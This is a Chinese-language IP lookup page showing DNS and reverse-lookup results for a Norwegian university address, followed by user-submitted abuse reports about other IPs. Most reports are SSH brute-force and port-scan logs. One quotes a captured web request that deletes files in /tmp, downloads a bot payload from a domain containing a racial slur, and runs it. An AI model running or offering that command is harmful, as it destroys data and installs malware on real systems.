必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Norway

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 129.242.82.84
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 40512
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;129.242.82.84.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025020602 1800 900 604800 86400

;; Query time: 36 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 07 07:47:16 CST 2025
;; MSG SIZE  rcvd: 106
HOST信息:
84.82.242.129.in-addr.arpa domain name pointer tromso-ansatte1-596.wifi.uit.no.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
84.82.242.129.in-addr.arpa	name = tromso-ansatte1-596.wifi.uit.no.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
212.12.243.169 attackspam
Unauthorized connection attempt from IP address 212.12.243.169 on Port 445(SMB)
2020-02-10 01:40:57
112.85.42.176 attack
Feb  9 07:39:29 web1 sshd\[23601\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.176  user=root
Feb  9 07:39:31 web1 sshd\[23601\]: Failed password for root from 112.85.42.176 port 4113 ssh2
Feb  9 07:39:34 web1 sshd\[23601\]: Failed password for root from 112.85.42.176 port 4113 ssh2
Feb  9 07:39:38 web1 sshd\[23601\]: Failed password for root from 112.85.42.176 port 4113 ssh2
Feb  9 07:39:41 web1 sshd\[23601\]: Failed password for root from 112.85.42.176 port 4113 ssh2
2020-02-10 01:43:06
177.46.143.160 attackspambots
Unauthorized connection attempt from IP address 177.46.143.160 on Port 445(SMB)
2020-02-10 01:45:36
122.51.83.60 attack
Feb  9 16:35:40 sd-53420 sshd\[22968\]: Invalid user lfh from 122.51.83.60
Feb  9 16:35:40 sd-53420 sshd\[22968\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.51.83.60
Feb  9 16:35:41 sd-53420 sshd\[22968\]: Failed password for invalid user lfh from 122.51.83.60 port 34396 ssh2
Feb  9 16:38:25 sd-53420 sshd\[23269\]: Invalid user hqy from 122.51.83.60
Feb  9 16:38:25 sd-53420 sshd\[23269\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.51.83.60
...
2020-02-10 01:42:35
116.104.32.122 attack
Telnet/23 MH Probe, BF, Hack -
2020-02-10 02:08:53
92.118.37.67 attackspam
Feb  9 19:16:12 debian-2gb-nbg1-2 kernel: \[3531409.294219\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=92.118.37.67 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=247 ID=58666 PROTO=TCP SPT=55919 DPT=279 WINDOW=1024 RES=0x00 SYN URGP=0
2020-02-10 02:22:20
82.102.142.164 attack
Feb  9 17:23:20 PAR-161229 sshd[39362]: Failed password for invalid user cxc from 82.102.142.164 port 40680 ssh2
Feb  9 17:39:07 PAR-161229 sshd[39701]: Failed password for invalid user evn from 82.102.142.164 port 43054 ssh2
Feb  9 17:42:16 PAR-161229 sshd[39842]: Failed password for invalid user nvf from 82.102.142.164 port 44302 ssh2
2020-02-10 02:16:28
104.248.159.69 attackspambots
Feb  9 sshd[2076]: Invalid user jdd from 104.248.159.69 port 48550
2020-02-10 02:11:50
49.235.12.159 attackbots
Feb  9 17:15:18 DAAP sshd[6190]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.235.12.159  user=www-data
Feb  9 17:15:20 DAAP sshd[6190]: Failed password for www-data from 49.235.12.159 port 50032 ssh2
Feb  9 17:17:28 DAAP sshd[6214]: Invalid user hadoop from 49.235.12.159 port 60152
Feb  9 17:17:28 DAAP sshd[6214]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.235.12.159
Feb  9 17:17:28 DAAP sshd[6214]: Invalid user hadoop from 49.235.12.159 port 60152
Feb  9 17:17:30 DAAP sshd[6214]: Failed password for invalid user hadoop from 49.235.12.159 port 60152 ssh2
...
2020-02-10 02:18:38
200.194.36.86 attackbotsspam
Automatic report - Port Scan Attack
2020-02-10 02:07:06
111.230.73.133 attackspam
ssh failed login
2020-02-10 01:43:26
183.193.234.142 attack
REQUESTED PAGE: /shell?cd+/tmp;rm+-rf+*;wget+http://jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws
2020-02-10 02:10:40
58.187.169.91 attackbotsspam
Unauthorized connection attempt from IP address 58.187.169.91 on Port 445(SMB)
2020-02-10 02:18:14
109.11.143.232 attackspam
Brute force attempt
2020-02-10 02:13:38
118.165.57.162 attackspam
Telnet/23 MH Probe, BF, Hack -
2020-02-10 02:01:20

最近上报的IP列表

251.152.238.195 195.227.188.27 189.58.24.87 200.70.2.112
43.47.233.74 35.203.66.141 109.205.178.25 61.95.169.207
107.28.111.152 144.179.139.234 186.56.123.102 216.39.253.142
183.80.202.236 171.73.67.167 125.215.25.89 31.12.233.47
214.15.233.68 24.110.194.85 52.122.80.87 51.216.24.213